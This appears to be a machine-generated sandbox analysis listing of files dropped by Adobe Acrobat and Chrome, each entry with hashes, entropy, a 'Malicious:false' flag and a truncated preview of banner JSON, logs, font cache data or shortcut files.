                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):289
                          Entropy (8bit):5.292757788772502
                          Encrypted:false
                          SSDEEP:
                          MD5:2E1785E819D6E5ADE905A34A3F1D3C7F
                          SHA1:5C274C34DFC8380953810377D78B52F2950340FC
                          SHA-256:B7A7E1E23A5CA7420BEA2A16465079CF3978126D65AC5BCA48CE40B71D952284
                          SHA-512:86346D5703F1B8E5E614177B691F4356FEDA898C842D78A2A8F63E8A9ADA9B52D16CCBD1660ADE386C0F77E10792DC5DF9F772CE09B04A6265CED8ED9CE19CDA
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):284
                          Entropy (8bit):5.279783600409507
                          Encrypted:false
                          SSDEEP:
                          MD5:EA8D70022B015568FF0544D130C5B590
                          SHA1:D0590D37D853189F243A8BCC1F26DA12294A2AC8
                          SHA-256:4AF9653ADCF72C42F1E859534FEEFC75276771F82624220FD0094E857CAB6E4F
                          SHA-512:4EA64B0238BAC0A164815066C169C386B571D78BF98668EC9D91BD459E5147651D1686DFEEBFD9404BD3F961CC2D5DAA0DE1F9C095B80EB3F0FF4BEBB218FBCA
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):291
                          Entropy (8bit):5.276354661093976
                          Encrypted:false
                          SSDEEP:
                          MD5:D2AD69998B12690469087C15C7CF32D7
                          SHA1:78D190148361F9ABFB0F0FD242ADF09634A701CF
                          SHA-256:DC95014BB481AB5054176742E731DA2F2B7CB7C0D0A5D5418A090F0489F1CBA7
                          SHA-512:68B017538FC5A0EAD047CF4F49A723574BFCDFDFBBB3F150E72F1380AAAFF48438A77E0AFDBE7302E90D8DEB3D27A51F37DF0C1F0296501FA04C62FA5AB76694
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):287
                          Entropy (8bit):5.279635738389018
                          Encrypted:false
                          SSDEEP:
                          MD5:F58BAA920F593CEB5B4563EF3ED03287
                          SHA1:9E2963D3689F37EF129837A487AB5657B09E1D44
                          SHA-256:75A335586590C94D6653DDCB86F4E555EB05B4CAB531D3E0F81A532ED2ADAB11
                          SHA-512:299882B912A68DE3637551B9FEB467979C6606033D27373CFA41824B576669C57968CB53353F2539AF51A5195D4E96A33681AD0421A8F9D070FE4EDE3DFBE246
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):1090
                          Entropy (8bit):5.65859203691726
                          Encrypted:false
                          SSDEEP:
                          MD5:788D7CC3CA3CDF8C6B114A7DDDD934DB
                          SHA1:38C4EE6EA1F90676262FC1376CF5499322CB3BEF
                          SHA-256:7F61B086D1F9569A0DC89E85A1340C93200E5D432053ABE9A65416D356DEFDDF
                          SHA-512:F0551B25D6A834BA1E7B8C533A79E3839C49DF3E6AFFC07A5E6B88EFF4AAD1472AF9B98F0FD6FCF3C40DDBFA9D1F46445BBCA5E51DF7525F30032668A91DC7C8
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):286
                          Entropy (8bit):5.256045474033808
                          Encrypted:false
                          SSDEEP:
                          MD5:7A1B76D5D9465E7B912EEDAFEDEC88C6
                          SHA1:CC9D95A38A24A0E858D8A640D4050E7B6FB1399F
                          SHA-256:91EC0524EB3D8AA02F8DC04AC729D6D2B86F194BAC5BE392DC292DB552DBA1EB
                          SHA-512:B312716AED7B0A96FC423DDEFCB5B71519E18FBDF7C60D400CCE5C0F31C6B14982A8709EC88CF9876C3258C826D5C00AD172D4BE59F4F0B9E6CE3C9D4DEC406E
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):782
                          Entropy (8bit):5.371847277450035
                          Encrypted:false
                          SSDEEP:
                          MD5:64F59E1776B2721B9E970114B2BF0ED6
                          SHA1:600DFE6935AA22C61B88A23A3B6CA07E98EE9125
                          SHA-256:E078CDF94DA47639E73B0474E19A04A386771B4616A19096918E305B8BF19624
                          SHA-512:EA76D2AE1EA27EA4BBFC74E63E96A310DB4396F5D83BB93F00E0310AE00E177260480277095D0A415DC3A760AABB0DFC1431DD1522A7E095F506F2B47254C978
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1731424993121}}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):4
                          Entropy (8bit):0.8112781244591328
                          Encrypted:false
                          SSDEEP:
                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                          Malicious:false
                          Reputation:unknown
                          Preview:....
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):2817
                          Entropy (8bit):5.124869676956109
                          Encrypted:false
                          SSDEEP:
                          MD5:277206A125E9618B3E2C314BD2F41219
                          SHA1:D5733097B3C20F23AB562C4B2BD990F7F81AC0CB
                          SHA-256:957EED97973920F58A1EFCDF819F01BE557CF25F57F4543677447C7A160F9248
                          SHA-512:189F3E6FD4A1F4254A3311A4E9C45853AC9C193B06394E1B24C226766D8F58BA78ED674FEA398F98827387157A1B5B841A1928BDA20F08BCEC071E7CF663AD62
                          Malicious:false
                          Reputation:unknown
                          Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"09ef940832ec8407991bace8009f1e2e","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1122,"ts":1731424993000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"73bdf32eb9689025baabf6d838f740c6","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1731424992000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"b670711806e7cefdebd6a237ed04816e","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1731424992000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"05c29b47cb63e7031f461e849e4628da","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1731424992000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"0ce0608f244fc2162884966f02e2e783","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1102,"ts":1731424992000},{"id":"Edit_InApp_Aug2020","info":{"dg":"546bf2f8e1b31a142981f196ee214da7","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":17
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                          Category:dropped
                          Size (bytes):12288
                          Entropy (8bit):0.9858853718212987
                          Encrypted:false
                          SSDEEP:
                          MD5:7D85DE94886AB88F1C392A5BF517E5CB
                          SHA1:38383474A6AF242DAE0C41D0E7B147A6013630CB
                          SHA-256:D7A2D597FD0B89570B4EF636F1076A4787F8AD5A13DE710F1E22087309108BDA
                          SHA-512:D58B30D855938E617206D3A0DA3E88F45140F14E45C37A6E1EA99A48FEDF6EE9928F7C805A3EC93A0A1261238E7601FBE58E86D19B27335032465A76435977A1
                          Malicious:false
                          Reputation:unknown
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:SQLite Rollback Journal
                          Category:dropped
                          Size (bytes):8720
                          Entropy (8bit):1.3422500505640889
                          Encrypted:false
                          SSDEEP:
                          MD5:D9FC50D307A20CACC73EDABD582FAD86
                          SHA1:2FD148521BB96335887B31F63AC2B2BC70AB46EA
                          SHA-256:EE9E93CDD1286A5B6B07756F4A63E7D2621710ED0829F9F1B343223E95D471CC
                          SHA-512:7CC7130937002FBE0923BCA6FB79FF290BEF665BBBB3C19B2F4AC1EADC285A865E370FAAE50DEBC52E46D319BDC25A8FD7FD9AAA86D0EFB3A17AF0B3D838C32D
                          Malicious:false
                          Reputation:unknown
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):66726
                          Entropy (8bit):5.392739213842091
                          Encrypted:false
                          SSDEEP:
                          MD5:5DF3A1A00388E1C8D8557F9590C31C33
                          SHA1:B9EFB4DF7BDB54FA9D6F9008546D07EBE3EE6AB3
                          SHA-256:9126D0B0CBF0E67B6B7476148B5A240C744C2AB5877DF197084C52E83F503896
                          SHA-512:E7FDA4E05067690CA7953C7E50E6A66B28B24BC1E33E1E7178EA9483D26AC64B9FE03D19CA98A38CB9D602C1FC0DE2351B7F3C43D71B6E1F6D7E1A65BCCD162F
                          Malicious:false
                          Reputation:unknown
                          Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):246
                          Entropy (8bit):3.488233466829981
                          Encrypted:false
                          SSDEEP:
                          MD5:3EF2A49D1B145213F033267BA846D3FF
                          SHA1:419CC346D6DDB27DF57E7AF6015F7AABE8512779
                          SHA-256:4C31CB1AA56C3EFA169C8B7E374FF792FDF95EA4AD1A417790C61631E8BFBAC7
                          SHA-512:721BC07F925BECB976B1458DE6A94F040C770E4ED47FA74527FAE5E35191F4FC54AA5FA54627B0EE5CC9714FF988B4385B23FFC85272A4EDFB8646BC1998FA29
                          Malicious:false
                          Reputation:unknown
                          Preview:Error 2711. The specified Feature name ('ARM') not found in Feature table. === Logging stopped: 12/11/2024  10:23:13 ===
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:ASCII text, with very long lines (393)
                          Category:dropped
                          Size (bytes):16525
                          Entropy (8bit):5.353642815103214
                          Encrypted:false
                          SSDEEP:
                          MD5:91F06491552FC977E9E8AF47786EE7C1
                          SHA1:8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
                          SHA-256:06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
                          SHA-512:A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
                          Malicious:false
                          Reputation:unknown
                          Preview:SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):29752
                          Entropy (8bit):5.414369540778172
                          Encrypted:false
                          SSDEEP:
                          MD5:AEA523391C44C3411B444DCFBC0E2446
                          SHA1:DB47F8D2664C98284B0A110AF0F6E421EDA8394D
                          SHA-256:6BC0113F86E30E2263D631D0DEE19EDEEAE5B0C11ED1F195E063BE1D45CB8CA3
                          SHA-512:DB9846F5B3B78C369F82A4AECCA6761E17CB520095A80773CEBD8913A778F661BEEDA93ECB0ABD4C9B72BC23FE512A2F36A5292671CD8C91394928E376CC191F
                          Malicious:false
                          Reputation:unknown
                          Preview:06-10-2023 10:08:42:.---2---..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 10:08:42:.Closing File..06-10-
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                          Category:dropped
                          Size (bytes):1419751
                          Entropy (8bit):7.976496077007677
                          Encrypted:false
                          SSDEEP:
                          MD5:1A39CAAE4C5F8AD2A98F0756FFCBA562
                          SHA1:279F2B503A0B10E257674D31532B01EA7DE0473F
                          SHA-256:57D198C7BDB9B002B8C9C1E1CCFABFE81C00FE0A1E30A237196A7C133237AA95
                          SHA-512:73D083E92FB59C92049AF8DC31A0AA2F38755453FFB161D18A1C4244747EE88B7A850F7951FC10F842AE65F6CC8F6164231DB6261777EC5379B337CB379BEF99
                          Malicious:false
                          Reputation:unknown
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                          Category:dropped
                          Size (bytes):758601
                          Entropy (8bit):7.98639316555857
                          Encrypted:false
                          SSDEEP:
                          MD5:3A49135134665364308390AC398006F1
                          SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                          SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                          SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                          Malicious:false
                          Reputation:unknown
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                          Category:dropped
                          Size (bytes):1407294
                          Entropy (8bit):7.97605879016224
                          Encrypted:false
                          SSDEEP:
                          MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                          SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                          SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                          SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                          Malicious:false
                          Reputation:unknown
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                          Category:dropped
                          Size (bytes):386528
                          Entropy (8bit):7.9736851559892425
                          Encrypted:false
                          SSDEEP:
                          MD5:5C48B0AD2FEF800949466AE872E1F1E2
                          SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                          SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                          SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                          Malicious:false
                          Reputation:unknown
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 12 14:23:10 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2673
                          Entropy (8bit):3.986250622800496
                          Encrypted:false
                          SSDEEP:
                          MD5:8C2375593FE7544D6F2D16C2D9AA6C9A
                          SHA1:66E3CC7F4E98D6011D63A3C703C33B2B95468320
                          SHA-256:3DF968F594C862BEB0D4799B304AC5EB376ACC692F9A75B6269ECB56231A7293
                          SHA-512:DAE560146D3799A15910B8871C80D102C551086C68285A6F527C1520C544B84DC384049AC86C9BD16A0774B1A177B2D7A7613E3E6EEC1C3E9F684D3823F25B11
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,......T..5..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IlY.z....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VlY.z....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VlY.z....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VlY.z..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VlY.z...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............X.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 12 14:23:10 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2675
                          Entropy (8bit):3.9998939018730915
                          Encrypted:false
                          SSDEEP:
                          MD5:EC7BCB759AA5698F0653B0245D9F75AA
                          SHA1:870E5A8B35EEB3C284D6E10CF59CBDB6400399CB
                          SHA-256:3EB0002DB5704B7287F879EE8A254F564AC272AC4F883C60B2F9C9C47993D715
                          SHA-512:6F5E4513B6116B3FB55D4467086F5E112235AC8600187037C7642B6E1D5AAB868DF29700F7AD9FEE96CB6D2551143E2113C0B1E2CC0D9883024941DF6B73A00E
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,..../.H..5..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IlY.z....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VlY.z....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VlY.z....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VlY.z..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VlY.z...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............X.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2689
                          Entropy (8bit):4.008974666516378
                          Encrypted:false
                          SSDEEP:
                          MD5:E8FFC1012FE8BA91570AC3C638594F92
                          SHA1:069B4DE5F76BCC68710BCE4969366F2BABBBECDD
                          SHA-256:F91C2E5827C0CBA9292D082D5096E46B1AF10CD31D7F633C94A96D6DA74F9642
                          SHA-512:6E1928497F582A2A10F3111DB180B3D63B5A31930FD9953207AAD47AE2B68EDBBB0970786B7B581083336911F7902B74A8555530869058F6A08173A0BECE30F5
                          Malicious:false
                          Reputation:unknown
